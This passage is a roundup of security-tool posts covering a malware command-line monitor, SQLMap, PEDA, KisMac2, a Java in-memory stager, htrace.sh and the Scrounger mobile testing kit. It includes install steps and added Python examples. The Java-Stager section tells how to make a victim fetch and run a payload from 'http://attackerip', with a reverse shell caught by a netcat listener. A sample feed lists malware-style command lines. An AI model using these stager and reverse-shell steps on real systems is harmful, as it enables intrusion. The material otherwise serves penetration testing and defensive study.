MalwareCMDMonitor – Shows Command Lines Used By Latest Instances Analyzed On Hybrid-Analysis

By using the MalwareCMDMonitor Python script, you can observe the command lines of the latest malware instances executed in the hybrid-analysis.com sandbox. In a nutshell, it downloads the HA feed and then retrieves the commands of unseen instances, i.e. the ones that did not appear in previous feeds.

Running The MalwareCMDMonitor

To run the script:

python hybrid_analysis.py

However, if you want to run the script on a regular basis, you can use the --daemon (or -d for short) switch.

python hybrid_analysis.py --daemon

Running the above command retrieves the feed every hour. To change the interval, use --cycle (or -c) and specify the number of minutes the script must wait before retrieving the feed again.

python hybrid_analysis.py --daemon --cycle 120

In the above example, the script sleeps for 2 hours between feed retrievals. Moreover, you can use --output (or -o) to specify the file in which to store the results. By default, the output is written to the console.

python hybrid_analysis.py --daemon --cycle 120 --output "c:\test\ha - cmd.log"

Last but not least, you can see all the switches by using --help (or -h):

python hybrid_analysis.py -h
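The core of what the script does (diff successive feed pulls, keep only instances not seen before, and pull out their command lines) as an added example; this is not MalwareCMDMonitor's own code. The two feeds are constructed, and the field names `job_id`, `processes` and `command_line` are assumptions, not the real Hybrid Analysis schema.

```python
"""Diff successive sandbox feed pulls and emit only the command lines of
instances not seen before (the idea behind MalwareCMDMonitor)."""
import json
from collections import Counter
from pathlib import Path

# Constructed sample feeds (not real Hybrid Analysis data). The field names
# job_id / processes / command_line are assumptions for this example.
FEED_T0 = {"data": [
    {"job_id": "job-0001", "processes": [
        {"command_line": "cmd.exe /c copy stage.bin %TEMP%\\s.bin"},
        {"command_line": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
                         ' -nop -w hidden -enc <BASE64>'}]},
    {"job_id": "job-0002", "processes": [
        {"command_line": "wscript.exe //B loader.js"}]},
]}
FEED_T1 = {"data": [
    FEED_T0["data"][1],                       # still in the feed, already seen
    {"job_id": "job-0003", "processes": [
        {"command_line": "cmd.exe /c ping -n 5 127.0.0.1 >nul & del /q stage.bin"}]},
]}


def new_commands(feed, seen):
    """Return (job_id, command_line) pairs for instances whose job_id is not
    in `seen`, and add those ids to `seen` so the next cycle skips them."""
    found = []
    for entry in feed.get("data", []):
        job_id = entry.get("job_id")
        if not job_id or job_id in seen:
            continue
        seen.add(job_id)
        for proc in entry.get("processes", []):
            cmd = (proc.get("command_line") or "").strip()
            if cmd:
                found.append((job_id, cmd))
    return found


def executable_name(cmd):
    """Basename of the program token, handling a quoted full path."""
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        token = cmd[1:end] if end > 0 else cmd[1:]
    else:
        token = cmd.split(None, 1)[0]
    return token.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def executable_counts(cmds):
    """How often each launcher appears: a cheap way to see which interpreters
    (powershell, wscript, ...) dominate the day's samples when tuning detections."""
    return Counter(executable_name(c) for _, c in cmds)


def load_seen(path):
    """Seen job ids persisted between daemon cycles (JSON list on disk)."""
    p = Path(path)
    return set(json.loads(p.read_text())) if p.exists() else set()


def save_seen(path, seen):
    Path(path).write_text(json.dumps(sorted(seen)))


if __name__ == "__main__":
    seen = set()
    first = new_commands(FEED_T0, seen)     # 3 command lines from 2 new jobs
    second = new_commands(FEED_T1, seen)    # only job-0003 is new
    for job, cmd in first + second:
        print(job, cmd)
    print(executable_counts(first + second))
```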

SQLMap v1.2.9 – Automatic SQL Injection & Database Takeover Tool

SQLMap v1.2.9 is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLMap v1.2.9 Installation

You can download the latest tarball or zipball from the sqlmap GitHub project.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples.

Credit: Netsparker Web Application Security Scanner

Peda – Python Exploit Development Assistance for GDB

PEDA is a python exploit development assistance for GDB.

Features

  • Enhance the display of gdb: colorize and display disassembly codes, registers, memory information during debugging.
  • Add commands to support debugging and exploit development (for a full list of commands use peda help):
    • aslr — Show/set ASLR setting of GDB
    • checksec — Check for various security options of binary
    • dumpargs — Display arguments passed to a function when stopped at a call instruction
    • dumprop — Dump all ROP gadgets in specific memory range
    • elfheader — Get headers information from debugged ELF file
    • elfsymbol — Get non-debugging symbol information from an ELF file
    • lookup — Search for all addresses/references to addresses which belong to a memory range
    • patch — Patch memory start at an address with string/hexstring/int
    • pattern — Generate, search, or write a cyclic pattern to memory
    • procinfo — Display various info from /proc/pid/
    • pshow — Show various PEDA options and other settings
    • pset — Set various PEDA options and other settings
    • readelf — Get headers information from an ELF file
    • ropgadget — Get common ROP gadgets of binary or library
    • ropsearch — Search for ROP gadgets in memory
    • searchmem|find — Search for a pattern in memory; support regex search
    • shellcode — Generate or download common shellcodes.
    • skeleton — Generate python exploit code template
    • vmmap — Get virtual mapping address ranges of section(s) in debugged process
    • xormem — XOR a memory region with a key

PEDA Installation

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

KisMac2 – Free Open Source Wireless Stumbling & Security Tool For Mac OS X

KisMAC2 is a free, open source wireless stumbling and security tool for Mac OS X. It is an active project that continues where the original development of KisMac stopped. The Trac for the original KisMac is at http://trac.kismac-ng.org

What’s new:

  • Mac OS 10.9 – 10.12 (64-bit only)
  • ARC (64-bit only)
  • New GUI
  • Modern Objective-C syntax
  • Rewrote most of the deprecated methods
  • Removed debug info from release

How To Build KisMAC2:

git clone https://github.com/IGRSoft/KisMac2.git ./KissMac2
cd KissMac2
git submodule update --init --recursive
open KisMac2.xcworkspace
Build

Credit: Vitalii Parovishnyk (Korich)

Java-Stager : A PoC To Download, Compile & Execute A Java File In Memory

A PoC Java-Stager which can download, compile, and execute a Java file in memory.

The key parts of the talk for me are:

  • Load a Stager onto victim (touches disk, but is a benign binary)
  • Stager downloads raw code over HTTP (which stays in memory)
  • Stager compiles raw code (also in memory)
  • Stager then executes compiled code (also in memory)

How To Use Java-Stager

  • Clone down the entire repository.
  • Open it in an IDE which can use maven (such as NetBeans)
  • The Stager and the example payload are available in the “/src/main/java” folder.
  • Alter the Stager as you would like and compile the project. I was using “clean/build” in the default profile.

The output in NetBeans included a line like this:

Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar

To work on your victim you must upload the “JavaStager*.jar” file and the “lib” folder containing Janino from the “target” folder.

The following command will execute the stager:

java -jar JavaStager-0.1-initial.jar

You will be prompted with the usage as shown:

Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>

The “url” is the only parameter that is passed to Stager. An example usage would be:

java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java

Your payload must be in a file called “Payload.java” and your exploit code must be in a static method called “Run”. The following shows the template if you want to write your own:

public class Payload {
   public static void Run() {
      // Your code here
   }
}

I have provided an example Reverse TCP payload in the file “TCPReverseShell.java”. To prevent name clashes this is not called “Payload.java” and the class name is wrong. The header comment in “TCPReverseShell.java” explains how to modify it to work.

You will need to host your “Payload.java” file on an HTTP server. The attacker will need to start a netcat listener to catch the connection back using the standard nc -lvp 8044 technique.

Credit: James Williams

htrace.sh – Simple Shell Script To Debugging Http/Https Traffic Tracing

htrace.sh is a simple shell script for debugging HTTP/HTTPS traffic tracing, response headers and mixed content. It scans a domain using the Nmap NSE library and supports external security tools: Mozilla Observatory and the SSL Labs API.

htrace.sh is a shell script that allows you to validate your domain configuration and catch any errors (e.g. redirect loops). It also displays basic information about the ssl configuration (if available), response headers, checks for mixed content and performs security scans using Nmap scripts and great external tools such as Ssllabs or Mozilla Observatory.

Functions

It is useful for:

  • checking domain configuration properly (web servers/reverse proxies)
  • redirect analysis, e.g. to eliminate redirect loops
  • checking response headers for each request
  • checking basic SSL configuration
    • validation of the certificates (date, CN, SAN) and verification of the SSL connection
  • scanning the domain for mixed content
  • scanning the domain using the Nmap NSE library
  • scanning the domain with external security tools: Mozilla Observatory and SSL Labs API

Note: Before using htrace.sh, please see Requirements.

How To Use htrace.sh

It’s simple:

# Clone this repository
git clone https://github.com/trimstray/htrace.sh

# Go into the repository
cd htrace.sh

# Install
./setup.sh install

# Run the app
htrace.sh --domain https://google.com

  • symlink to bin/htrace.sh is placed in /usr/local/bin
  • man page is placed in /usr/local/man/man8

External Tools

htrace.sh supports external tools for security scans:

  • Mozilla Observatory – CLI version of observatory.mozilla.org
    with params: --format=report --rescan --zero --quiet
  • Ssllabs – command-line reference-implementation client for the SSL Labs API
    with params: -quiet -grade
  • mixed-content-scan – CLI tool to check an HTTPS-enabled website for Mixed Content
    with params: -user-agent \"$_user_agent\" --no-check-certificate
  • Nmap NSE Library – provides automated security scans with Nmap
    with scripts:

    • http-auth-finder
    • http-chrono
    • http-cookie-flags
    • http-cors
    • http-cross-domain-policy
    • http-csrf
    • http-dombased-xss
    • http-git
    • http-grep
    • http-internal-ip-disclosure
    • http-jsonp-detection
    • http-malware-host
    • http-methods
    • http-passwd
    • http-phpself-xss
    • http-php-version
    • http-robots.txt
    • http-sitemap-generator
    • http-shellshock
    • http-stored-xss
    • http-unsafe-output-escaping
    • http-useragent-tester
    • http-vhosts
    • http-xssed
    • ssl-enum-ciphers
    • whois-ip

If you don’t know how to install these tools and where they should be placed, please see the Dockerfile, where every step is described.

Note: When scanning for mixed content or with the Nmap scripting engine, remember that it may take a long time before the entire site is checked.
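Two of the checks listed under Functions (redirect analysis with a --max-redirects cap so loops are reported rather than followed forever, and the mixed-content scan of the final HTTPS page), reimplemented in Python as an added example; this is not htrace.sh's own code. The HTTP responses come from a constructed table standing in for real servers, so it runs offline.

```python
"""Two of the htrace.sh checks, done offline: following a redirect chain with
a --max-redirects cap so loops are reported, and scanning the final HTTPS
page for mixed content."""
import re
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}

# Constructed responses standing in for real servers: url -> (status, headers, body).
RESPONSES = {
    "http://example.com/": (301, {"Location": "https://example.com/"}, ""),
    "https://example.com/": (302, {"Location": "https://www.example.com/"}, ""),
    "https://www.example.com/": (200, {"Strict-Transport-Security": "max-age=63072000"},
        '<html><head>'
        '<link rel="stylesheet" href="http://cdn.example.com/site.css">'
        '<script src="https://www.example.com/app.js"></script></head>'
        '<body><img src="/logo.png"><img src="http://img.example.com/banner.png">'
        '<a href="http://example.org/">external link</a></body></html>'),
    # A misconfigured vhost whose two URLs redirect to each other.
    "https://loop.example.com/": (302, {"Location": "/login"}, ""),
    "https://loop.example.com/login": (302, {"Location": "/"}, ""),
}


def fetch(url):
    """Stand-in for an HTTP client: looks the URL up in RESPONSES."""
    return RESPONSES.get(url, (404, {}, ""))


def follow_redirects(url, max_redirects=10, fetch=fetch):
    """Follow Location headers starting at `url`.

    Returns (verdict, chain): verdict is 'ok', 'loop', 'max-redirects' or
    'error'; chain lists every (url, status) hop that was requested."""
    chain, visited, redirects = [], set(), 0
    while True:
        status, headers, _ = fetch(url)
        chain.append((url, status))
        if status not in REDIRECT_CODES:
            return ("ok" if status < 400 else "error"), chain
        location = headers.get("Location")
        if not location:
            return "error", chain           # redirect without a target
        visited.add(url)
        nxt = urljoin(url, location)        # Location may be relative
        if nxt in visited:
            return "loop", chain
        if redirects >= max_redirects:
            return "max-redirects", chain
        redirects += 1
        url = nxt


# Sub-resources a browser would actually load; <a href> is navigation, not
# mixed content, so it is deliberately not listed.
SUBRESOURCE = re.compile(
    r'<(?:script|img|link|iframe|audio|video|source|embed)\b[^>]*?'
    r'\s(?:src|href)=["\'](http://[^"\']+)', re.I)


def mixed_content(page_url, html):
    """URLs of sub-resources fetched over plain http from an https page."""
    if not page_url.lower().startswith("https://"):
        return []
    return SUBRESOURCE.findall(html)


def check_domain(url, max_redirects=10):
    """Roughly what `htrace.sh --domain <url> --mixed-content` reports."""
    verdict, chain = follow_redirects(url, max_redirects)
    final_url, _ = chain[-1]
    _, _, body = fetch(final_url)
    return {
        "verdict": verdict,
        "chain": chain,
        "mixed_content": mixed_content(final_url, body) if verdict == "ok" else [],
    }


if __name__ == "__main__":
    for start in ("http://example.com/", "https://loop.example.com/"):
        result = check_domain(start)
        print(start, "->", result["verdict"])
        for hop, status in result["chain"]:
            print("   ", status, hop)
        for res in result["mixed_content"]:
            print("    mixed content:", res)
```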

Reports

If you want to generate a report in html format, use the ansi2html.sh tool. A detailed description of use:

htrace.sh -d https://nmap.org -s -h | ansi2html --bg=dark > report.html

Build image

cd htrace.sh/build
docker build --rm -t htrace.sh -f Dockerfile .

Run container

docker run --rm -it --name htrace.sh htrace.sh -d http://nmap.org -h

Parameters

Provides the following options:

    htrace.sh v1.0.6

Usage:
    htrace.sh <option|long-option>

  Examples:
    htrace.sh --domain https://example.com
    htrace.sh --domain https://example.com -s -h --scan ssllabs

  Options:
        --help                                show this message
        -d|--domain <domain_name>             set domain name
        -s|--ssl                              show ssl server/connection params
        -h|--headers                          show response headers
        --scan <all|observatory|ssllabs>      scan domain with external security tools
        --mixed-content                       scan website for mixed content
        --nse                                 scan website with nmap nse library
        --user-agent <val>                    set 'User-Agent' header
        --max-redirects <num>                 set max redirects (default: 10)
        --timeout <num>                       set max timeout (default: 15)

Credit: GPLv3

Scrounger – Mobile Application Testing Toolkit

Scrounger is a mobile application toolkit. The word Scrounger means a person who borrows from or lives off others. There is no better description for this tool for two main reasons: the first is that this tool takes inspiration from many other tools that have already been published, the second is that it lives off mobile applications’ vulnerabilities.

The main features Scrounger offers that others don’t:

  • Works with Android and iOS
  • Metasploit-like console and modules
  • Offers a variety of modules that can be run to give the pentester a starting point
  • Easily extendable

Even though several other mobile application analysis tools have been developed, there is no single tool that can be used for both Android and iOS and can be called a “standard” must-use on every mobile application assessment.

The idea behind this toolkit is to make a Metasploit-like tool that will not do a pentester’s work but help the pentester on an assessment by executing the mundane tasks that need to be performed on all assessments.

Scrounger Installation

git clone https://github.com/nettitude/scrounger.git
cd scrounger
bash setup.sh
pip install -r requirements.txt
python setup.py install

Development

git clone https://github.com/nettitude/scrounger.git
cd scrounger
bash setup.sh
pip install -r requirements.txt
python setup.py develop

Update

cd scrounger
git pull
python setup.py install

Install Scripts

Linux

# install iproxy lsusb
sudo apt-get install libimobiledevice usbutils

# install jd-cli
if [ ! -x "$(which jd-cli)" ]; then
    curl -L -o /tmp/jdcli.zip https://github.com/kwart/jd-cmd/releases/download/jd-cmd-0.9.2.Final/jd-cli-0.9.2-dist.zip
    # unzip needs -d for the destination directory; without it the second argument is a filename filter
    unzip /tmp/jdcli.zip -d /usr/local/share/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli /usr/local/bin/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli.jar /usr/local/bin/jd-cli.jar
    rm -rf /tmp/jdcli.zip
fi

# install apktool
if [ ! -x "$(which apktool)" ]; then
    mkdir /usr/local/share/apktool
    curl -L -o /usr/local/share/apktool/apktool https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/osx/apktool
    curl -L -o /usr/local/share/apktool/apktool.jar https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.3.3.jar
    # the wrapper script and jar live inside the apktool directory; link both into PATH
    chmod +x /usr/local/share/apktool/apktool /usr/local/share/apktool/apktool.jar
    ln -s /usr/local/share/apktool/apktool /usr/local/bin/apktool
    ln -s /usr/local/share/apktool/apktool.jar /usr/local/bin/apktool.jar
fi

# install dex2jar
if [ ! -x "$(which d2j-dex2jar)" ]; then
    curl -L -o /tmp/d2j.zip https://github.com/pxb1988/dex2jar/files/1867564/dex-tools-2.1-SNAPSHOT.zip
    unzip /tmp/d2j.zip -d /tmp/d2j
    dirname=$(ls --color=none /tmp/d2j)
    mv /tmp/d2j/$dirname /usr/local/share/d2j-dex2jar
    ln -s /usr/local/share/d2j-dex2jar/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar.sh
    ln -s /usr/local/share/d2j-dex2jar/d2j-apk-sign.sh /usr/local/bin/d2j-apk-sign.sh
    rm -rf /tmp/d2j.zip
fi

if [ ! -x "$(which d2j-dex2jar)" ]; then
    ln -s /usr/local/bin/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar
fi

# install adb
if [ ! -x "$(which adb)" ]; then
    curl -L -o /tmp/platform-tools.zip https://dl.google.com/android/repository/platform-tools-latest-linux.zip
    unzip /tmp/platform-tools.zip -d /tmp/pt
    mv /tmp/pt/platform-tools /usr/local/share/
    ln -s /usr/local/share/platform-tools/adb /usr/local/bin/adb
    ln -s /usr/local/share/platform-tools/fastboot /usr/local/bin/fastboot
fi

# install ldid
if [ ! -x "$(which ldid)" ]; then
    git clone https://github.com/daeken/ldid.git /tmp/ldid
    cd /tmp/ldid
    ./make.sh
    mv ldid /usr/local/bin/
    cd /tmp
    rm -rf /tmp/ldid
fi

# install jtool
if [ ! -x "$(which jtool)" ]; then
    curl -L -o /tmp/jtool.tar http://www.newosxbook.com/tools/jtool.tar
    mkdir /tmp/jtool
    tar xvf /tmp/jtool.tar -C /tmp/jtool
    mv /tmp/jtool/jtool.ELF64 /usr/local/bin/jtool
    rm -rf /tmp/jtool.tar /tmp/jtool
fi

# install scrounger
git clone git@github.com:nettitude/scrounger.git
cd scrounger
pip install -r requirements.txt
python setup.py install

MacOS

# install iproxy ldid lsusb
brew tap jlhonora/lsusb && brew install lsusb libimobiledevice ldid

# install jd-cli
if [ ! -x "$(which jd-cli)" ]; then
    curl -L -o /tmp/jdcli.zip https://github.com/kwart/jd-cmd/releases/download/jd-cmd-0.9.2.Final/jd-cli-0.9.2-dist.zip
    # unzip needs -d for the destination directory; without it the second argument is a filename filter
    unzip /tmp/jdcli.zip -d /usr/local/share/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli /usr/local/bin/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli.jar /usr/local/bin/jd-cli.jar
    rm -rf /tmp/jdcli.zip
fi

# install apktool
if [ ! -x "$(which apktool)" ]; then
    mkdir /usr/local/share/apktool
    curl -L -o /usr/local/share/apktool/apktool https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/osx/apktool
    curl -L -o /usr/local/share/apktool/apktool.jar https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.3.3.jar
    # the wrapper script and jar live inside the apktool directory; link both into PATH
    chmod +x /usr/local/share/apktool/apktool /usr/local/share/apktool/apktool.jar
    ln -s /usr/local/share/apktool/apktool /usr/local/bin/apktool
    ln -s /usr/local/share/apktool/apktool.jar /usr/local/bin/apktool.jar
fi

# install dex2jar
if [ ! -x "$(which d2j-dex2jar)" ]; then
    curl -L -o /tmp/d2j.zip https://github.com/pxb1988/dex2jar/files/1867564/dex-tools-2.1-SNAPSHOT.zip
    unzip /tmp/d2j.zip -d /tmp/d2j
    dirname=$(ls /tmp/d2j)   # BSD ls on macOS has no --color option
    mv /tmp/d2j/$dirname /usr/local/share/d2j-dex2jar
    ln -s /usr/local/share/d2j-dex2jar/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar.sh
    ln -s /usr/local/share/d2j-dex2jar/d2j-apk-sign.sh /usr/local/bin/d2j-apk-sign.sh
    rm -rf /tmp/d2j.zip
fi

if [ ! -x "$(which d2j-dex2jar)" ]; then
    ln -s /usr/local/bin/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar
fi

# install adb
if [ ! -x "$(which adb)" ]; then
    curl -L -o /tmp/platform-tools.zip https://dl.google.com/android/repository/platform-tools-latest-darwin.zip
    unzip /tmp/platform-tools.zip -d /tmp/pt
    mv /tmp/pt/platform-tools /usr/local/share/
    ln -s /usr/local/share/platform-tools/adb /usr/local/bin/adb
    ln -s /usr/local/share/platform-tools/fastboot /usr/local/bin/fastboot
fi

# install Xcode / command line tools
xcode-select --install

# install scrounger
git clone git@github.com:nettitude/scrounger.git
cd scrounger
pip install -r requirements.txt
python setup.py install

Adding Custom Modules

When installing the application a folder ~/.scrounger will be created. Inside ~/.scrounger will be a folder called modules/custom with the same structure as the default scrounger modules, e.g., analysis/android/module_name.

To create a new custom module just add a new file with the module name you want and it will be included the next time you launch scrounger.

Example

Added the following module (~/.scrounger/modules/custom/misc/test.py):

from scrounger.core.module import BaseModule

class Module(BaseModule):
    meta = {
        "author": "RDC",
        "description": """Just a Test module""",
        "certainty": 100
    }

    options = [
        {
            "name": "output",
            "description": "local output directory",
            "required": False,
            "default": None
        },
    ]

    def run(self):

        print("This is a print from the custom module")

        return {
            "print": "This will be print by scrounger's console."
        }

Execution

$ scrounger-console
Starting Scrounger console...

scrounger > list custom/misc

Module            Certainty  Author  Description
------            ---------  ------  -----------
custom/misc/test  100%       RDC     Just a Test module

scrounger > use custom/misc/test

scrounger custom/misc/test > options

Global Options:

    Name    Value
    ----    -----
    device
    output  /tmp/scrounger-app

Module Options (custom/misc/test):

    Name    Required  Description             Current Setting
    ----    --------  -----------             ---------------
    output  False     local output directory  /tmp/scrounger-app

scrounger custom/misc/test > run
This is a print from the custom module
[+] This will be print by scrounger's console.

scrounger custom/misc/test >

Examples

Listing / Searching modules

$ scrounger-console
Starting Scrounger console...

> help

Documented commands (type help <topic>):
========================================
add_device  devices  list     print  results  set   unset
back        help     options  quit   run      show  use


> help list
Lists all available modules

> list ios

Module                                  Certainty Author Description
------                                  --------- ------ -----------
analysis/ios/app_transport_security     90%       RDC    Checks if there are any Application Transport Security misconfigurations
analysis/ios/arc_support                90%       RDC    Checks if a binary was compiled with ARC support
analysis/ios/backups                    90%       RDC    Checks the application's files have the backup flag on
analysis/ios/clipboard_access           75%       RDC    Checks if the application disables clipboard access
analysis/ios/debugger_detection         75%       RDC    Checks if the application detects debuggers
analysis/ios/excessive_permissions      90%       RDC    Checks if the application uses excessive permissions
analysis/ios/file_protection            90%       RDC    Checks the application's files specific protection flags
analysis/ios/full_analysis              100%      RDC    Runs all modules in analysis and writes a report into the output directory
analysis/ios/insecure_channels          50%       RDC    Checks if the application uses insecure channels
analysis/ios/insecure_function_calls    75%       RDC    Checks if the application uses insecure function calls
analysis/ios/jailbreak_detection        60%       RDC    Checks if the application implements jailbreak detection
analysis/ios/logs                       60%       RDC    Checks if the application logs to syslog
analysis/ios/passcode_detection         60%       RDC    Checks if the application checks for passcode being set
analysis/ios/pie_support                100%      RDC    Checks if the application was compiled with PIE support
analysis/ios/prepared_statements        60%       RDC    Checks if the application uses sqlite calls and if so checks if it also uses prepared statements
analysis/ios/ssl_pinning                60%       RDC    Checks if the application implements SSL pinning
analysis/ios/stack_smashing             90%       RDC    Checks if a binary was compiled stack smashing protections
analysis/ios/third_party_keyboard       65%       RDC    Checks if an application checks of third party keyboards
analysis/ios/unencrypted_communications 80%       RDC    Checks if the application implements communicates over unencrypted channels
analysis/ios/unencrypted_keychain_data  70%       RDC    Checks if the application saves unencrypted data in the keychain
analysis/ios/weak_crypto                60%       RDC    Checks if the application uses weak crypto
analysis/ios/weak_random                50%       RDC    Checks if a binary uses weak random functions
analysis/ios/weak_ssl_ciphers           50%       RDC    Checks if a binary uses weak SSL ciphers
misc/ios/app/archs                      100%      RDC    Gets the application's available architectures
misc/ios/app/data                       100%      RDC    Gets the application's data from the remote device
misc/ios/app/entitlements               100%      RDC    Gets the application's entitlements
misc/ios/app/flags                      100%      RDC    Gets the application's compilation flags
misc/ios/app/info                       100%      RDC    Pulls the Info.plist info from the device
misc/ios/app/start                      100%      RDC    Launches an application on the remote device
misc/ios/app/symbols                    100%      RDC    Gets the application's symbols out of an installed application on the device
misc/ios/class_dump                     100%      RDC    Dumps the classes out of a decrypted binary
misc/ios/decrypt_bin                    100%      RDC    Decrypts and pulls a binary application
misc/ios/install_binaries               100%      RDC    Installs iOS binaries required to run some checks
misc/ios/keychain_dump                  100%      RDC    Dumps contents from the connected device's keychain
misc/ios/local/app/archs                100%      RDC    Gets the application's available architectures
misc/ios/local/app/entitlements         100%      RDC    Gets the application's entitlements from a local binary and saves them to file
misc/ios/local/app/flags                100%      RDC    Gets the application's compilation flags using local tools. Will look for otool and jtool in the PATH.
misc/ios/local/app/info                 100%      RDC    Pulls the Info.plist info from the unzipped IPA file and saves an XML file with it's contents to the output folder
misc/ios/local/app/symbols              100%      RDC    Gets the application's symbols out of an installed application on the device
misc/ios/local/class_dump               100%      RDC    Dumps the classes out of a decrypted binary
misc/ios/pull_ipa                       100%      RDC    Pulls the IPA file from a remote device
misc/ios/unzip_ipa                      100%      RDC    Unzips the IPA file into the output directory

Using Misc Module

$ scrounger-console
Starting Scrounger console...

> use misc/android/decompile_apk

misc/android/decompile_apk > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (misc/android/decompile_apk):

    Name   Required Description                Current Setting
    ----   -------- -----------                ---------------
    output True     local output directory     /tmp/scrounger-app
    apk    True     local path to the APK file

misc/android/decompile_apk > set output scrounger-demo-output

misc/android/decompile_apk > set apk ./a.apk

misc/android/decompile_apk > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (misc/android/decompile_apk):

    Name   Required Description                Current Setting
    ----   -------- -----------                ---------------
    output True     local output directory     scrounger-demo-output
    apk    True     local path to the APK file ./a.apk

misc/android/decompile_apk > run
2018-05-01 10:29:53 -                  decompile_apk : Creating decompilation directory
2018-05-01 10:29:53 -                  decompile_apk : Decompiling application
2018-05-01 10:29:59 -                       manifest : Checking for AndroidManifest.xml file
2018-05-01 10:29:59 -                       manifest : Creating manifest object
[+] Application decompiled to scrounger-demo-output/com.eg.challengeapp.decompiled

Using results from other modules

misc/android/decompile_apk > show results

Results:

    Name                             Value
    ----                             -----
    com.eg.challengeapp_decompiled scrounger-demo-output/com.eg.challengeapp.decompiled

misc/android/decompile_apk > use analysis/android/permissions

analysis/android/permissions > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (analysis/android/permissions):

    Name           Required Description                                        Current Setting
    ----           -------- -----------                                        ---------------
    decompiled_apk True     local folder containing the decompiled apk file
    permissions    True     dangerous permissions to check for, seperated by ; android.permission.GET_TASKS;android.permission.BIND_DEVICE_ADMIN;android.permission.USE_CREDENTIALS;com.android.browser.permission.READ_HISTORY_BOOKMARKS;android.permission.PROCESS_OUTGOING_CA

analysis/android/permissions > print option permissions

Option Name: permissions
Value: android.permission.GET_TASKS;android.permission.BIND_DEVICE_ADMIN;android.permission.USE_CREDENTIALS;com.android.browser.permission.READ_HISTORY_BOOKMARKS;android.permission.PROCESS_OUTGOING_CALLS;android.permission.READ_LOGS;android.permission.READ_SMS;android.permission.READ_CALL_LOG;android.permission.RECORD_AUDIO;android.permission.MANAGE_ACCOUNTS;android.permission.RECEIVE_SMS;android.permission.RECEIVE_MMS;android.permission.WRITE_CONTACTS;android.permission.DISABLE_KEYGUARD;android.permission.WRITE_SETTINGS;android.permission.WRITE_SOCIAL_STREAM;android.permission.WAKE_LOCK

analysis/android/permissions > set decompiled_apk result:com.eg.challengeapp_decompiled

analysis/android/permissions > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (analysis/android/permissions):

    Name           Required Description                                        Current Setting
    ----           -------- -----------                                        ---------------
    decompiled_apk True     local folder containing the decompiled apk file    result:com.eg.challengeapp_decompiled
    permissions    True     dangerous permissions to check for, seperated by ; android.permission.GET_TASKS;android.permission.BIND_DEVICE_ADMIN;android.permission.USE_CREDENTIALS;com.android.browser.permission.READ_HISTORY_BOOKMARKS;android.permission.PROCESS_OUTGOING_CA

analysis/android/permissions > run
2018-05-01 10:54:58 -                       manifest : Checking for AndroidManifest.xml file
2018-05-01 10:54:58 -                       manifest : Creating manifest object
2018-05-01 10:54:58 -                    permissions : Analysing application's manifest permissions
[+] Analysis result:
The Application Has Inadequate Permissions
    Report: True
    Details:
* android.permission.READ_SMS
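The check that analysis/android/permissions performs in the session above, reimplemented as an added stand-alone example (not Scrounger's own module code) so the logic runs without the framework. The manifest is constructed, the dangerous-permission list is the module's default value as printed above, and the result mirrors the console output.

```python
"""Report which of a configured set of dangerous permissions an Android app
requests, by reading its decompiled AndroidManifest.xml."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Default of the module's `permissions` option, exactly as printed by
# `print option permissions` in the session above (';'-separated).
DEFAULT_DANGEROUS = (
    "android.permission.GET_TASKS;android.permission.BIND_DEVICE_ADMIN;"
    "android.permission.USE_CREDENTIALS;"
    "com.android.browser.permission.READ_HISTORY_BOOKMARKS;"
    "android.permission.PROCESS_OUTGOING_CALLS;android.permission.READ_LOGS;"
    "android.permission.READ_SMS;android.permission.READ_CALL_LOG;"
    "android.permission.RECORD_AUDIO;android.permission.MANAGE_ACCOUNTS;"
    "android.permission.RECEIVE_SMS;android.permission.RECEIVE_MMS;"
    "android.permission.WRITE_CONTACTS;android.permission.DISABLE_KEYGUARD;"
    "android.permission.WRITE_SETTINGS;android.permission.WRITE_SOCIAL_STREAM;"
    "android.permission.WAKE_LOCK"
)

# Constructed manifest for the package seen in the session; not a real app.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.eg.challengeapp">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission-sdk-23 android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:label="Challenge"/>
</manifest>
"""


def parse_dangerous(option_value):
    """Split the ';'-separated option into a set, ignoring blanks."""
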